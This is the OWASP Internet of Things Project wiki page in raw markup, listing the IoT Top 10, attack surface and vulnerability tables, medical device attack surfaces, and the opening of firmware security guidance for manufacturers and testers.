Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten 2014 Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten 2014 PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<nowiki/>{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
